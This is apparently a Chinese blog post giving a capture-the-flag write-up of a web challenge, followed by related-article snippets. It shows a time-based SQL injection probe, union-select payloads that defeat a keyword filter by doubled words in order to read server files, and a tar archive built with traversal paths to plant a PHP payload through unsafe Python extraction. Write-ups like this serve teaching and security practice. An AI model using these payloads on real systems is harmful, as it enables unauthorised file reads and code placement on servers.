tar解压目录穿越+联合注入+双写绕过

最新推荐文章于 2023-07-05 09:34:04 发布
最新推荐文章于 2023-07-05 09:34:04 发布
阅读量2.6k 收藏 1
点赞数 2
分类专栏: Web 文章标签: php linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanmiqi/article/details/110202417
版权

tar解压目录穿越+联合注入+双写绕过

联合注入+双写绕过

之前在太湖杯web题(CrossFire)上遇到个好玩的题,题目上线很久没有大佬做出来,后来给了提示,刷刷刷都做出来了,赛后学到许多,来这总结下。

官方提示: 注入+目录穿越

1'||sleep(2)%23

存在注入 利用双写来绕过

-1' ununionion selselectect load_file(0x2f7661722f7777772f68746d6c2f696e6465782e706870)%23

十六进制 0x2f7661722f7777772f68746d6c2f696e6465782e706870
转字符 /var/www/html/index.php

index.php

<?php
    error_reporting(0);
    session_start();
    include('config.php');

    $upload = 'upload/'.md5("shuyu".$_SERVER['REMOTE_ADDR']);
    @mkdir($upload);
    file_put_contents($upload.'/index.html', '');
    
    if(isset($_POST['submit'])){
        $allow_type=array("jpg","gif","png","bmp","tar","zip");
        $fileext = substr(strrchr($_FILES['file']['name'], '.'), 1);
        if ($_FILES["file"]["error"] > 0 && !in_array($fileext,$type) && $_FILES["file"]["size"] > 204800){
            die('upload error');
        }else{
            $filename=addslashes($_FILES['file']['name']);
            $sql="insert into img (filename) values ('$filename')";
            $conn->query($sql);
            $sql="select id from img where filename='$filename'";
            $result=$conn->query($sql);


            if ($result->num_rows > 0) {
                while($row = $result->fetch_assoc()) {
                    $id=$row["id"];
                }
            move_uploaded_file($_FILES["file"]["tmp_name"],$upload.'/'.$filename);
            header("Location: index.php?id=$id");
            }
        }
    }

    elseif (isset($_GET['id'])){
        $id=addslashes($_GET['id']);
        $sql="select filename from img where id=$id";
        $result=$conn->query($sql);
        if ($result->num_rows > 0) {
            while($row = $result->fetch_assoc()) {
                $filename=$row["filename"];
            }
        $img=$upload.'/'.$filename;
        echo "<img src='$img'/>";
        }
    }

    elseif (isset($_POST['submit1'])){
        $allow_type=array("jpg","gif","png","bmp","tar","zip");
        $fileext = substr(strrchr($_FILES['file']['name'], '.'), 1);
        if ($_FILES["file"]["error"] > 0 && !in_array($fileext,$type) && $_FILES["file"]["size"] > 204800){
            die('upload error');
        }else{
            $filename=addslashes($_FILES['file']['name']);
            move_uploaded_file($_FILES["file"]["tmp_name"],$upload.'/'.$filename);
            @exec("cd /tmp&&python3 /tar.py ".escapeshellarg('/var/www/html/'.$upload.'/'.$filename));
            }
        }
?>





config.php

$conn=mysqli_connect("localhost","root","root","shuyu"); 
if (mysqli_connect_error($conn))
{ 
    echo "???? MySQL ???: " . mysqli_connect_error(); 
} 
foreach ($_GET as $key => $value) {
	 $value= str_ireplace('\'','',$value);
	 $value= str_ireplace('"','',$value);
     $value= str_ireplace('union','',$value);
     $value= str_ireplace('select','',$value);
     $value= str_ireplace('from','',$value);
     $value= str_ireplace('or','',$value);
	 $_GET[$key] =$value;
 }
?>

赛后发现其实根目录下也留了源码 /www.zip (滑稽)

1 ununionion selselectect load_file(0x2f7461722e7079)%23
#/tar.py

#tar.py
import tarfile
import sys
tar = tarfile.open(sys.argv[1], "r")
tar.extractall()#解压缩包

php相关代码

@exec("cd /tmp&&python3 /tar.py
".escapeshellarg('/var/www/html/'.$upload.'/'.$filename));

这里python的解压就存在很大的问题





tar解压目录穿越

tar 命令可以在打包的时候把路径也打包进去

那么 对于解压 是不是也可以指定目录解压?(目录穿越)

我在自己的主机上执行:

root@kali:~# tar cPvf midi.tar ../../../../../../../../var/www/html/testupload/payload.php

此时在本机生成了自己的midi.tar压缩文件

当在其他机器上解压此文件 会不会在/var/www/html/testupload/目录下生成payload.php呢?

经过测试

Linux下解压(使用的是GNU的tar),默认情况下,tar会自动把前面的/去掉,然后在当前目录解压

Unix则不然,会依照绝对路径解压,对路径中的其他文件不影响,对相同的文件,覆盖。如果不存在某个目录,则创建(如果有权限)。

在这里 python的解压 与Unix的解压同理,会直接在指定路径下进行解压




我们将制作好的midi.tar 上传进行解压,最终会在/var/www/html/testupload/下生成我们的payload.php

ISMidi
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
web安全之目录穿越
weixin_54584489的博客
04-13 3253
目录穿越(又称目录遍历diretory traversal/path traversal)是通过目录控制序列 ../ 或者文件绝对路径来访问存储在文件系统上的任意文件和目录的一种漏洞。
CVE-2020-36193:Drupal目录穿越漏洞通告
爱国小白帽
01-22 1222
报告编号:B6-2021-012201 报告来源:360CERT 报告作者:360CERT 更新日期:2021-01-22 0x01漏洞简述 2021年01月22日,360CERT监测发现Drupal发布了Drupal 目录穿越漏洞的风险通告,该漏洞编号为CVE-2020-36193,漏洞等级:高危,漏洞评分:7.2。 远程攻击者通过构造包含符号链接的.tar、.tar.gz、.bz2、.tlz文件,结合 drupal 系统中的上传点,可造成任意代码执行。 对此,360CERT建议广大用户及时将Drupa.
Android Zip解压目录穿越导致文件覆盖漏洞
道阻且长,行则将至。
05-19 3451
文章目录漏洞简述漏洞实例正常压缩包恶意压缩包历史漏洞任意命令执行问题根因分析漏洞防御 漏洞简述 zip 类型的压缩包文件中允许存在 ../ 类型的字符串,用于表示上一层级的目录。攻击者可以利用这一特性,通过精心构造 zip 文件,利用多个 ../ 从而改变 zip 包中某个文件的存放位置,达到替换掉原有文件的目的。 那么,如果被替换掉的文件是是 .so、.dex 或 .odex 类型文件,那么攻击者就可以轻易更改原有的代码逻辑,轻则产生本地拒绝服务漏洞,影响应用的可用性,重则可能造成任意代码执行漏洞,危害应
写写python中tarfile模块
qq_44370158的博客
07-05 353
模块提供了创建、打开、读取和写入 tar 文件的函数和类。文件是一种存档文件格式,可以将多个文件和目录打包成一个文件,便于传输和存储。模块是 Python 标准库中用于创建和操作 tar 文件的模块。目录中的所有文件和子目录添加到 tar 文件中。创建一个压缩的 tar 文件。模块还支持压缩和解压tar 文件,可以使用。以下是一个简单的示例,演示了如何使用。的 tar 文件,并将其赋值给变量。在这个例子中,我们首先导入。
BUUCTF刷题记录(4)
bmth666的博客
04-12 1419
文章目录web[ACTF2020 新生赛]Upload web [ACTF2020 新生赛]Upload 和之前极客大挑战一样的题,上传后缀为phtml即可 连上蚁剑,即可得到flag
基于HTML+JavaScript实现的web版写作业帮助器源码.tar
最新发布
11-17
基于HTML+JavaScript实现的web版写作业帮助器源码.tar基于HTML+JavaScript实现的web版写作业帮助器源码.tar基于HTML+JavaScript实现的web版写作业帮助器源码.tar基于HTML+JavaScript实现的web版写作业帮助器源码.tar...
CentOS下tar打包解压详解(解压到指定文件夹)
01-20
解压文件到指定目录tar -zxvf /home/zjx/aa.tar.gz -C /home/zjx/pf tar [-cxtzjvfpPN] 文件与目录…. 参数: -c :建立一个压缩文件的参数指令(create 的意思); -x :解开一个压缩文件的参数指令! -t :...
ACE+TAO-6.5.0.tar.gz
03-01
linux下OpenDDS环境搭建,所需的软件包,ACE+TAO-6.5.0.tar.gz。 解压,创建环境变量,创建文件等等操作可百度,这里不再赘述,外网下载慢,这里提供快速的下载包,本人编译可通过。
CRF++-0.58.tar.gz.zip
06-28
要使用这个压缩包,你需要先解压最外层的`.zip`文件,然后对内部的`.tar.gz`文件执行解压操作。这通常可以通过以下命令完成: ```bash unzip CRF++-0.58.tar.gz.zip cd CRF++-0.58 tar -zxvf CRF++-0.58.tar.gz ```...
arpack++.tar.gz_ARPACK_arpack++_arpack++.tar.gz_eigenvalue_scale
09-20
在给定的 "arpack++.tar.gz" 压缩包中,包含了 ARPACK++ 的源代码和其他相关文件,用户可以将其解压后在自己的项目中集成和使用。 ARPACK 的全称是 Arnoldi Package,它基于迭代的 Arnoldi 过程和 Lanczos 过程,...
20210424web渗透学习之命令注入提权的常见方法%ctf题目(通配符在野、tar、chown、rsync、ln)
qq_45290991的博客
04-24 1264
命令执行到提权 </h1> <div class="clear"></div> <div class="postBody"> <div id="cnblogs_post_body" class="blogpost-body blogpost-body-html"> Zedd / 2019-03-1...
一次上传点解压缩的渗透测试
hackzkaq的博客
05-16 413
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员——sssaa 接到授权测试,给到的信息只有,目标网站是一个共享3D模型网站,主要的功能只有一个上传模型功能 这个网站没有后台管理员入口,所以这里主要测试上传点 发现注册时可以上传头像,上传限制了白名单,且各种绕过失败(没截到图) 先通过验证码爆破注册了用户test(没截到图,主要是随便加了个手机号,然后确定发送到Intruder对验证码进行爆破,就注册成功了test) 接着上传模型 上传模型处是上传zip,先测试随便上传一个png文件,提示了解
linuxtar命令解压到指定的目录 及其他目录
蚂蚁狂飙DODODOJUSTDO
12-31 1103
linuxtar命令解压到指定的目录 : #tar zxvf /bbs.tar.zip -C /zzz/bbs     //把根目录下的bbs.tar.zip解压到/zzz/bbs下,前提要保证存在/zzz/bbs这个目录  这个和cp命令有点不同,cp命令如果不存在这个目录就会自动创建这个目录! 附:用tar命令打包 例:将当前目录下的zz
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410) 复现
Brucetg的博客
06-15 4977
Spring Cloud Config Spring Cloud Config 是 Spring Cloud 中用于分布式配置管理的组件,Spring Cloud Config 为分布式系统中的外部配置提供服务器和客户端支持。 影响版本 Spring Cloud Config: 2.2.0 to 2.2.2 Spring Cloud Config: 2.1.0 to 2.1.8 复现过程 https://github.com/spring-cloud/spring-cloud-config/releas
Java防御目录穿越漏洞方法_WinRAR目录穿越漏洞复现及防御
weixin_35794316的博客
03-01 1034
漏洞背景2019 年2 月 20日 @NadavGrossman 发表了一篇关于他如何发现一个在WinRAR 中存在19 年的逻辑问题以至成功实现代码执行的文章。WinRAR 代码执行相关的CVE 编号如下:CVE-2018-20250,CVE-2018-20251, CVE-2018-20252, CVE-2018-20253该漏洞是由于WinRAR 所使用的一个陈旧的动态链接库UNACEV2....
Linux打包命令tar解压路径问题
Hongyu_Zhou的博客
05-11 9769
Linux中常用的解压命令tar # 压缩和解压命令通常的使用方法是tar cvzf /home/user/somename.tar foldername # 将foldername文件夹下的内容都压缩到指定位置/home/user下,打包成名叫somename.tar的压缩文件解压方法是tar xzvf somename.tar # 将somename.tar文件解压到当前执行命令所在目...
警惕: Python 中的路径穿越
zzzzls 的博客
12-21 3940
os 和 pathlib 都是 Python 内置的模块,可以很方便的帮助我们完成路径的拼接而无需担心不同系统下的路径格式问题,但却存在一个严重的安全风险:路径穿越
SQL注入绕过关键词过滤的小技巧及原理(union select为例)
热门推荐
weixin_54848371的博客
09-22 1万+
本文以联合查询关键字union select为例讲解绕过关键词过滤的一些方法。之所以了解绕过,关键是发现sqlmap有时候真的是不靠谱,只能指定命令跑。有一些简单过滤很容易绕过却不能检测。虽然麻烦点,手工yyds~~。 1、大小写变种 UNION SELECT=>uNIon SElecT 选择几个字母变换大小写,可以绕过部分不太聪明的过滤器。在sql查询中是不区分大小写的所以查询语句正常执行 2、使用SQL注释 union select=>/**/UNION/**/...
Bypass之D盾IIS防火墙SQL联合注入绕过(新版)
18年3月萌新白帽子
07-04 1万+
这种技术文章,不好意思标原创了,一下内容均来自公众号Bypass实验环境IIS+ASPX+MSSQL一、MSSQL特性在MSSQL中,参数和union之间的位置,常见的可填充的方式有如下几种:1.空白字符01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,202.注...
linuxtar解压目录
10-17
Linux中,使用tar命令解压目录可以使用以下命令: ``` tar -zxvf yourfile.tar.gz -C /your/destination/path/ ``` 其中,`yourfile.tar.gz`是你要解压的文件名,`/your/destination/path/`是你要解压到的目标路径。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值